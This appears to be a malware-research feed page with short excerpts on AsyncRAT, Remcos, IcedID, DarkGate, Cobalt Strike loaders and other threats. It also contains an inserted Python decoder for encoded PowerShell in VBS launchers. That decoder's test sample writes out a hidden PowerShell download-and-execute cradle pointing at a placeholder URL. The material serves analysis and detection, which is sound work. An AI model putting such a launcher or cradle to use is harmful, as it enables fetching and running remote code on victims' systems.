One of the largest cybercrime services for laundering stolen merchandise was hacked recently, exposing its internal operations, finances and organizational structure. Here’s a closer look at the Russia-based SWAT USA Drop Service, which currently employs more than 1,200 people across the United States who are knowingly or unwittingly involved in reshipping expensive consumer goods purchased with stolen credit cards.…
Tag: SPAM
Authored by Lakshya Mathur & Vignesh Dhatchanamoorthy
AsyncRAT, short for “Asynchronous Remote Access Trojan,” is a sophisticated piece of malware designed to compromise the security of computer systems and steal sensitive information. What sets AsyncRAT apart from other malware strains is its stealthy nature, making it a formidable adversary in the world of cybersecurity.…
Unpacking malware can be a tedious task, often involving intensive static analysis and in-depth knowledge of debugging.
In this post, I’ll demonstrate an easy method that can be used to unpack files that ultimately load a .NET based malware.
This method primarily involves running the file and monitoring for process executions using Process Hacker.…
In this post, we’ll demonstrate a process for decoding a Visual Basic Script (.vbs) file that contains an encoded PowerShell script used to download Remcos malware from Google Drive.
We’ll manually analyse and deobfuscate both the VBS and the PowerShell, and develop a decoder to obtain IOCs and decoded values.…
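As an added example (not code from the referenced post), the script below shows the kind of decoder such an analysis ends with: it pulls a base64/UTF-16LE `-EncodedCommand` blob out of a VBS launcher, decodes it, and extracts URL IOCs. The VBS sample, the download URL and the assumption that the PowerShell is encoded in the standard `-EncodedCommand` form are all constructed for illustration; the real script’s obfuscation may differ.

```python
import base64
import re

# Constructed sample: a minimal VBS launcher of the kind described above.
# The embedded PowerShell is base64 over UTF-16LE, the form expected by
# `powershell -EncodedCommand`. The URL is a placeholder, not a real IOC.
_PS_SCRIPT = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('https://drive.google.com/uc?id=EXAMPLE')"
)
_ENCODED = base64.b64encode(_PS_SCRIPT.encode("utf-16le")).decode()
SAMPLE_VBS = (
    'Set sh = CreateObject("WScript.Shell")\n'
    f'sh.Run "powershell -nop -w hidden -enc {_ENCODED}", 0, False\n'
)

# Longest alias first so the alternation does not stop at "-e" or "-enc"
# when the launcher spells out "-encodedcommand".
ENC_RE = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
URL_RE = re.compile(r"""https?://[^\s'")]+""")


def decode_encoded_command(blob):
    """Decode one -EncodedCommand argument back to PowerShell source.

    Returns None when the token is not valid base64/UTF-16LE, so a false
    positive from the regex does not abort the whole extraction.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, base64.binascii.Error):
        return None
    if len(raw) % 2:  # UTF-16LE payloads are always an even byte count
        return None
    return raw.decode("utf-16le", errors="replace")


def extract_powershell(vbs_text):
    """Return every decoded PowerShell command found in the VBS text."""
    decoded = (decode_encoded_command(m) for m in ENC_RE.findall(vbs_text))
    return [cmd for cmd in decoded if cmd]


def extract_iocs(ps_text):
    """Return the de-duplicated URLs referenced by the decoded script."""
    return sorted(set(URL_RE.findall(ps_text)))


if __name__ == "__main__":
    for cmd in extract_powershell(SAMPLE_VBS):
        print("decoded:", cmd)
        print("urls:", extract_iocs(cmd))
```

Run it against a real launcher by replacing `SAMPLE_VBS` with the file contents; if the VBS builds the command through string concatenation or `Chr()` calls, that layer has to be flattened first (as the post does by hand) before the regex will see a contiguous base64 token.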
Coming from the newspaper and media industry, I’m no stranger to wanting to write catchy headlines. I’m certainly at fault for throwing together a story about so-and-so’s house sold for X million dollars.
But recently I’ve been wondering if those “big numbers” for cybersecurity are helpful at all, even though they might generate clicks to a news organization. …
Intermediate
Improving Malware Analysis Workflows by Modifying the default Ghidra UI.
Matthew, Oct 25, 2023 — 4 min read
The Ghidra user interface can be intimidating and complicated for users who are not familiar with the tool.
In this post, I’ll go over some changes that I made in order to improve the usability of Ghidra and ensure a better analysis experience.…
Proofpoint researchers identified TA571 delivering the Forked variant of IcedID in two campaigns on 11 and 18 October 2023. Both campaigns included over 6,000 messages, each impacting over 1,200 customers in a variety of industries globally.
Emails in the campaigns purported to be replies to existing threads.…
Most, if not all malvertising incidents result from a threat actor either injecting code within an existing ad, or intentionally creating one. Today, we look at a different scenario where, as strange as that may sound, malvertising was entirely accidental.
The reason this happened was due to the combination of two separate factors: a compromised website and Google Dynamic Search Ads.…
Demonstrating how to manually decode a complex .vbs script used to load Cobalt Strike shellcode into memory.
The referenced script implements heavy text-based obfuscation. We can defeat this obfuscation by utilising CyberChef and Regex.
After deobfuscation, we will identify some “malformed” shellcode which we will manually fix, before emulating it with the SpeakEasy emulator.…
In this post, we will demonstrate a process for decoding a simple .hta loader used to load Cobalt Strike shellcode. We will perform initial analysis using a text editor, and use CyberChef to extract the embedded shellcode. From there we will validate the shellcode using an emulator (SpeakEasy) and perform some basic analysis using Ghidra.…
Threat actors focus on gaining remote access to and control of victims’ devices. To do this they either use fake apps or masquerade as legitimate apps. This blog is about the Rusty Droid RAT, which masquerades as the Chrome browser for Android. The sample under consideration is taken from this tweet.…
The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, backdoors, blockchain, botnets, hexadecimal IP notation, infostealers, and ransomware. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.…
We detail an ongoing campaign abusing the messaging platforms Skype and Teams to distribute the DarkGate malware to targeted organizations. We also discovered that once DarkGate is installed on the victim’s system, additional payloads are introduced to the environment.
From July to September, we observed the DarkGate campaign (detected by Trend Micro as TrojanSpy.AutoIt.DARKGATE.AA)…
AhnLab Security Emergency response Center (ASEC) spotted the AgentTesla infostealer being distributed through email as a malicious BAT file. When the BAT file is executed, it uses a fileless method to run AgentTesla (an EXE) without writing the executable to the user’s PC.…